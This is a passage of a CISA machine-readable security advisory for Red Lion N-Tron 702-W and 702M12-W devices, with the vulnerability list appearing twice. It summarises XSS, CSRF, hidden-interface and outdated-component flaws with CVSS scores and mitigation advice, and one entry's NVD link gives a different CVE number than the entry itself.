"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] }, { "cve": "CVE-2020-16206", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data.CVE-2020-16206 has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16206" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.0, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] }, { "cve": "CVE-2020-16208", "cwe": { "id": "CWE-352", "name": "Cross-Site Request Forgery (CSRF)" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable to cross-site request forgery, which may allow an attacker to modify different configurations of a device by luring an authenticated user to click on a crafted link.CVE-2020-16208 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16208" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 8.8, "baseSeverity": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] }, { "cve": "CVE-2020-16204", "cwe": { "id": "CWE-912", "name": "Hidden Functionality" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable due to an undocumented interface found on the device, which may allow an attacker to execute commands as root on the device.CVE-2020-16204 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16204" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.8, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] }, { "cve": "CVE-2017-16544", "cwe": { "id": "CWE-1104", "name": "Use of Unmaintained Third Party Components" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable due to outdated software components, which may allow an attacker to gain access to sensitive information and take control of the device.CVE-2017-16544 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16544" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 8.8, "baseSeverity": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] } ] }
ICSA-20-240-01
Vulnerability from csaf_cisa
Notes
{ "document": { "acknowledgments": [ { "names": [ "Thomas Weber" ], "organization": "SEC Consult Vulnerability Lab", "summary": "reporting these vulnerabilities to CISA" } ], "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Disclosure is not limited", "tlp": { "label": "WHITE", "url": "https://us-cert.cisa.gov/tlp/" } }, "lang": "en-US", "notes": [ { "category": "general", "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "title": "CISA Disclaimer" }, { "category": "legal_disclaimer", "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.", "title": "Legal Notice" }, { "category": "summary", "text": "Successful exploitation of these vulnerabilities could allow an attacker to gain unauthorized access to sensitive information, execute system commands, and perform actions in the context of an attacked user.", "title": "Risk evaluation" }, { "category": "other", "text": "Commercial Facilities, Energy, Transportation Systems, Water and Wastewater Systems", "title": "Critical infrastructure sectors" }, { "category": "other", "text": "Worldwide", "title": "Countries/areas deployed" }, { "category": "other", "text": "United States", "title": "Company headquarters location" }, { "category": "general", "text": "CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:", "title": "Recommended Practices" }, { "category": "general", "text": "CISA also recommends users take the following measures to protect themselves from social engineering attacks:", "title": "Recommended Practices" }, { "category": "general", "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage onus-cert.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.", "title": "Recommended Practices" }, { "category": "general", "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.", "title": "Recommended Practices" }, { "category": "other", "text": "No known public exploits specifically target these vulnerabilities.", "title": "Exploitability" } ], "publisher": { "category": "coordinator", "contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870", "name": "CISA", "namespace": "https://www.cisa.gov/" }, "references": [ { "category": "self", "summary": "ICS Advisory ICSA-20-240-01 JSON", "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2020/icsa-20-240-01.json" }, { "category": "self", "summary": "ICS Advisory ICSA-20-240-01 Web Version", "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-20-240-01" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.us-cert.gov/ncas/tips/ST04-014" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B" } ], "title": "Red Lion N-Tron 702-W, 702M12-W", "tracking": { "current_release_date": "2020-08-27T00:00:00.000000Z", "generator": { "engine": { "name": "CISA CSAF Generator", "version": "1.0.0" } }, "id": "ICSA-20-240-01", "initial_release_date": "2020-08-27T00:00:00.000000Z", "revision_history": [ { "date": "2020-08-27T00:00:00.000000Z", "legacy_version": "Initial", "number": "1", "summary": "ICSA-20-240-01 Red Lion N-Tron 702-W, 702M12-W" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "vers:all/*", "product": { "name": "N-Tron 702M12-W: All versions", "product_id": "CSAFPID-0001" } } ], "category": "product_name", "name": "N-Tron 702M12-W" }, { "branches": [ { "category": "product_version", "name": "vers:all/*", "product": { "name": "N-Tron 702-W: All versions", "product_id": "CSAFPID-0002" } } ], "category": "product_name", "name": "N-Tron 702-W" } ], "category": "vendor", "name": "Red Lion, AutomationDirect" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-16210", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable to reflected cross-site scripting, which may allow an attacker to remotely execute arbitrary code and perform actions in the context of an attacked user.CVE-2020-16210 has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16210" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.0, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] }, { "cve": "CVE-2020-16206", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data.CVE-2020-16206 has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16206" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.0, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] }, { "cve": "CVE-2020-16208", "cwe": { "id": "CWE-352", "name": "Cross-Site Request Forgery (CSRF)" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable to cross-site request forgery, which may allow an attacker to modify different configurations of a device by luring an authenticated user to click on a crafted link.CVE-2020-16208 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16208" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 8.8, "baseSeverity": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] }, { "cve": "CVE-2020-16204", "cwe": { "id": "CWE-912", "name": "Hidden Functionality" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable due to an undocumented interface found on the device, which may allow an attacker to execute commands as root on the device.CVE-2020-16204 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16204" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.8, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] }, { "cve": "CVE-2017-16544", "cwe": { "id": "CWE-1104", "name": "Use of Unmaintained Third Party Components" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable due to outdated software components, which may allow an attacker to gain access to sensitive information and take control of the device.CVE-2017-16544 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16544" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 8.8, "baseSeverity": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001", "CSAFPID-0002" ] } ] } ] }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.